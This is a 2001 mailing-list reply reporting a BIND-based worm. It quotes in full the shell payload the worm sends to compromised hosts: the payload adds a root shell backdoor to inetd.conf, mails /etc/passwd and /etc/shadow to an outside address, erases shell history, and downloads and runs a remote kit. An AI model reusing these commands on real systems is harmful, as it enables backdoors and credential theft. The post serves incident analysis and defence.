Re: BIND worm.

[Andreas Östling <andreaso () it su se>]

On Thursday 22 March 2001 12:19,  Scott A. McIntyre wrote:
> I'm wondering how many others have seen sign of what appears to be a
> BIND based worm attack that's been passing through here lately.

I've seen it.
After the actual BIND exploit, here is what it sends (to port 53/TCP):

PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PAT
H;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.li
b;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con
f;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat
 /etc/shadow >>1i0n;mail 1i0nip () china com <1i0n;rm -fr 1i0n;rm -
fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i
0n.tgz;tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit

You can grab the kit from the URL above if you want to analyse it further.
I have a local copy of it if it isn't available there anymore.

Regards,
Andreas Östling